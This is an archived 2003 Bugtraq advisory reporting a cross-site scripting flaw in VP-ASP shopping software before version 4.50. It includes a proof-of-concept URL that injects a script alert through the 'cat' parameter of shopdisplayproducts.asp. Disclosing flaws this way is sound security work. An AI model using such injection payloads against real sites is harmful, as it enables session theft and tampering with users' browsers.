lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20031205121928.135FC7276@sitemail.everyone.net>
Date: Fri, 5 Dec 2003 04:19:28 -0800 (PST)
From: Xnuxer Research Laboratory <xnuxer@...ux.net>
To: bugtraq@...urityfocus.com
Subject: Cross Site Scripting in VP-ASP


   Advisory Name: Cross Site Scripting in VP-ASP
    Release Date: December 05st, 2003
     Application: VP-ASP
Version Affected: < 4.50
        Platform: ASP
        Severity: Low
        Discover: Xnuxer Research Lab. (xnuxer@...ux.net, xnuxer@...oo.com)
      Vendor URL: http://www.vp-asp.com
       Reference: http://infosekuriti.com

Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]

Exploit Example:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>



_____________________________________________________________
Linux.Net -->Open Source to everyone
Powered by Linare Corporation
http://www.linare.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ